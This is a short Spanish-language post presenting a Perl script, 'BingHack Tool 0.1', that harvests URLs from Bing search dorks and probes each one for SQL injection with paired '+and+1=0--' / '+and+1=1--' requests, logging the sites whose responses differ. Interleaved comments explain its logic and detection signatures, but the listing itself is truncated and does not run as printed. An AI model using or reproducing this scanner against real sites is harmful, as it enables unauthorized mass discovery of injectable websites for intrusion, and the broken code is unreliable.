Un simple script en Perl para buscar páginas vulnerables a SQLi usando Bing.
El código
#!usr/bin/perl
#BingHack Tool 0.1
#Coded By Doddy H
use LWP::UserAgent;
# Shared HTTP client; toma() sends every request of the script through it.
my $nave = LWP::UserAgent->new;

# All requests carry this fixed, dated Firefox 2 User-Agent and a 5-second
# timeout. The constant string is a usable indicator when reviewing web
# server or WAF logs for traffic from this script.
$nave->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201Firefox/2.0.0.12");
$nave->timeout(5);

head();

# Two lines are read from standard input: the search query, then the value
# handed to bing() as its second argument (the upper bound of its loop).
chomp( my $dork = <stdin> );
chomp( my $pags = <stdin> );

print "\n[+] Searching ...\n";
my @urls = bing( $dork, $pags );

print "\n[+] Pages Found : " . scalar(@urls) . "\n";
print "\n[+] Scanning ...\n\n";

# Each URL returned by bing() is passed to sql() in turn.
foreach my $candidate (@urls) {
    sql($candidate);
}

print "\n[+] Finished\n";
copyright();
# Boolean-based difference check: fetches a URL once with a false condition
# and once with a true condition appended, and reports it when the two
# response bodies differ.
# NOTE(review): $page is read here but not assigned in the lines shown; the
# listing looks truncated by extraction -- confirm against the original post.
sub sql {
# "+" stands for a space in a query string and "--" starts an SQL comment, so
# the suffixes sent are "+and+1=0--" and "+and+1=1--".
# Seen from the server side this is a pair of GETs for the same URL ending in
# those suffixes, sent with the fixed User-Agent set at the top of the script;
# that pair is a practical signature for log review or a WAF rule.
my ( $pass1, $pass2 ) = ( "+", "--" );
my $testar1 = toma( $page . $pass1 . "and" . $pass1 . "1=0" . $pass2 );
my $testar2 = toma( $page . $pass1 . "and" . $pass1 . "1=1" . $pass2 );
# The bodies are compared byte for byte, so any page whose content changes
# between requests (timestamps, rotating banners) is reported as well; a hit
# is not proof of injection. Where the parameter is bound through a
# parameterized query, the appended text is typically treated as data and
# both responses come back the same.
unless ( $testar1 eq $testar2 ) {
# "\a" rings the terminal bell; savefile() receives the log name and $page.
print "[+] SQLI : $page\a\n"; savefile( "sql-logs.txt", $page );
}
}
# Opens the file named by the first argument in append mode on the bareword
# handle SAVE.
# NOTE(review): in the lines shown nothing is written to the handle and it is
# not closed; the listing looks truncated by extraction. The open is the
# 2-argument form with the mode concatenated to the name, and its result is
# not checked.
sub savefile {
open( SAVE
, ">>" . $_[0] ); }
# Requests Bing result pages for the query in the first argument, stepping the
# "first" offset from 10 in increments of 10 up to the second argument, and
# scans each page for result-link markup.
# NOTE(review): $a and $b are also the package variables used by sort, and
# $pages is not declared with my.
# NOTE(review): the query is concatenated into the URL as-is (no escaping).
sub bing {
my ( $a, $b ) = @_;
for ( $pages = 10 ; $pages <= $b ; $pages = $pages + 10 ) {
my $code =
toma( "http://www.bing.com/search?q=" . $a . "&first=" . $pages );
# Matches the href of each <h3><a ...> result heading; the loop body is empty
# in this listing, which looks truncated by extraction.
while ( $code =~ /<h3><a href="(.*?)"/mig ) {
}
}
# The @founds on the right-hand side is the package variable, because the
# lexical declared by "my" is not in scope until the statement ends. The value
# of this last statement is what the sub returns.
my @founds = repes( cortar(@founds) );
}
# Duplicate filter: each argument is pushed onto @limpio the first time it is
# seen, using per-value counters in the package hash %repe.
# NOTE(review): %repe and $test are not lexical, so the counters persist
# between calls. No return of @limpio is visible in the lines shown; the
# listing looks truncated by extraction.
sub repes {
my @limpio;
foreach $test (@_) {
push @limpio, $test unless $repe{$test}++; }
}
# Trims each argument that contains "=" to the text before its first "=" plus
# the "=" itself, collecting the results in @nuevo.
# NOTE(review): the else branch is empty and no return of @nuevo is visible in
# the lines shown; the listing looks truncated by extraction.
sub cortar {
my @nuevo;
for (@_) {
if ( $_ =~ /=/ ) {
# @tengo is a package variable; @tengo[0] is a one-element slice used where
# $tengo[0] would normally be written.
@tengo = split( "=", $_ ); push( @nuevo, @tengo[0] . "=" ); }
else {
}
}
}
# Banner routine called once at start-up; the body is an ASCII-art logo.
# NOTE(review): the statement that opened this banner (only its closing ");"
# survives) is missing from the lines shown, so the block does not parse as
# printed here; the listing looks truncated by extraction.
sub head {
@@@@ @ @ @ @ @@@@@ @
@ @ @ @ @ @ @
@ @ @ @ @ @ @
@ @ @ @ @@ @@@@ @ @ @@@ @@@ @ @ @ @@@ @@@ @
@@@@ @ @@ @ @ @ @@@@@@ @ @ @ @ @ @ @ @ @ @ @
@ @ @ @ @ @ @ @ @ @@@@ @ @@ @ @ @ @ @ @
@ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @
@ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @
@@@@ @ @ @ @@@@ @ @ @@@@ @@@ @ @ @ @@@ @@@ @
@
@@@@
);
}
sub copyright {
    # Emit the author's credit line, then read from standard input so the
    # console stays open until the user presses Enter.
    my $credit = "\n\n-- == (C) Doddy Hackman 2012\n\n";
    print $credit;
    <stdin>;
}
sub toma {
    # Issue a GET for the URL in the first argument through the shared
    # LWP::UserAgent client and hand back the response body. The HTTP status
    # is not inspected, so whatever content the response object carries is
    # returned whether or not the request succeeded.
    my $respuesta = $nave->get( $_[0] );
    return $respuesta->content;
}
# The End ?